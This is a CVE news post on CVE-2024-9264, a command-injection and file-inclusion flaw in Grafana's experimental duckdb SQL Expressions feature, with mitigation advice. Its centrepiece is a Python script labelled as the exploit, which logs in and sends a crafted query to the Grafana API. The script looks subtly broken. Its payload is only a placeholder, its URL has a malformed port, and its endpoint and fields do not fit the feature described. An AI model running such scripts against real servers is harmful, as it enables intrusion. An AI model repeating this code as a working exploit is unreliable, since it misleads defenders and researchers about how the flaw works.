CVE CyberSecurity Database News

CVE-2024-9264 - Unsanitized SQL Expressions in Grafana Allow Command Injection and Local File Inclusion

Poster -

Undoubtedly, Grafana is an open-source, powerful data visualization and monitoring tool. However, a recent vulnerability has been discovered, designated CVE-2024-9264, which affects the SQL Expressions experimental feature in Grafana. This feature allows users to evaluate duckdb queries containing user input, which, unfortunately, has been found to be insufficiently sanitized before being passed on to duckdb. This leads to a dangerous command injection and local file inclusion vulnerability. Any Grafana user with VIEWER or higher permission has the potential to execute this attack.

It should be noted that for this attack to be successful, the duckdb binary must be present in Grafana's $PATH. By default, this binary is not installed in Grafana distributions. Therefore, users with unmodified installations are less likely to be affected.

Details and Exploit

This vulnerability is due to improper input sanitization when users input SQL expressions into Grafana. When a malicious user submits a specially crafted duckdb query through Grafana's interface, it enables them to inject operating system commands or include files from the server where Grafana is running.

Below is a code snippet illustrating the exploit

import requests

# Replace with your Grafana URL, username, and password
grafana_url = "http://localhost:300";
username = "admin"
password = "admin"

# Log in to Grafana to obtain the auth token
auth_url = f"{grafana_url}/api/auth/login"
auth_payload = {"user": username, "password": password}
auth_response = requests.post(auth_url, json=auth_payload)
auth_token = auth_response.json()["authToken"]

# Create a malicious duckdb query
malicious_query = ";os_command_to_inject_or_local_file_to_include;"

# Send a request to the Grafana API with the malicious query, and the auth token
exploit_url = f"{grafana_url}/api/tsdb/query"
headers = {"Authorization": f"Bearer {auth_token}"}
exploit_payload = {
    "queries": [
        {
            "expr": malicious_query,
            "intervalMs": 60000,
            "maxDataPoints": 960,
            "refId": "A",
            "datasourceId": 1,
        }
    ],
    "from": "1560418321266",
    "to": "1560432923266",
}
exploit_response = requests.post(exploit_url, json=exploit_payload, headers=headers)
print(exploit_response.json())

This code snippet enables attackers to exploit the vulnerability by logging in to Grafana, creating a malicious duckdb query, and sending it through the Grafana API.

Mitigation and Remediation

As this is an experimental feature, it's highly recommended to disable it if not in use. Grafana administrators should ensure that the duckdb binary is not present in the $PATH if the SQL Expressions feature is not actively being used.

Grafana has already been informed about this issue, and it is expected that a fix will be released in a future version. Until then, it's essential to be cautious with the use of this feature and monitor any unexpected behavior by users.

Original References

1. Grafana documentation - SQL Expressions with DuckDB
2. DuckDB website - Getting Started
3. Grafana GitHub repository - Security Issue Reporting

Timeline

Published on: 10/18/2024 04:15:04 UTC
Last modified on: 10/18/2024 12:52:33 UTC